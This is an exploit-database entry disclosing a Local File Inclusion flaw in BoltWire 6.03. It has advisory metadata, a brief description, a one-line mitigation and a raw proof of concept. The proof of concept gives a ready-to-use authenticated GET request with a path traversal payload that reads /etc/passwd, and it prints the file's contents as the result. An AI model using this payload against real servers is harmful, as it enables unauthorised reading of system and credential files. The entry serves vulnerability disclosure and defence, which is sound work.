BoltWire 6.03 - Local File Inclusion

vendor:

BoltWire

by:

Andrey Stoykov

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: BoltWire

Affected Version From: 6.03

Affected Version To: 6.03

Patch Exists: NO

Related CWE: N/A

CPE: a:boltwire:boltwire:6.03

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu 20.04 LAMP

2020

BoltWire 6.03 – Local File Inclusion

BoltWire 6.03 is vulnerable to Local File Inclusion (LFI). An authenticated user can send a specially crafted HTTP GET request to the vulnerable page, which allows the attacker to read arbitrary files from the server. This can be exploited to gain access to sensitive information such as the /etc/passwd file.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.

Source

Exploit-DB raw data:

# Exploit Title: BoltWire 6.03 - Local File Inclusion
# Date: 2020-05-02
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://www.boltwire.com/
# Software Link: https://www.boltwire.com/downloads/go&v=6&r=03
# Version: 6.03
# Tested on: Ubuntu 20.04 LAMP


LFI:

Steps to Reproduce:

1) Using HTTP GET request browse to the following page, whilst being authenticated user.
http://192.168.51.169/boltwire/index.php?p=action.search&action=../../../../../../../etc/passwd

Result

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
[SNIPPED]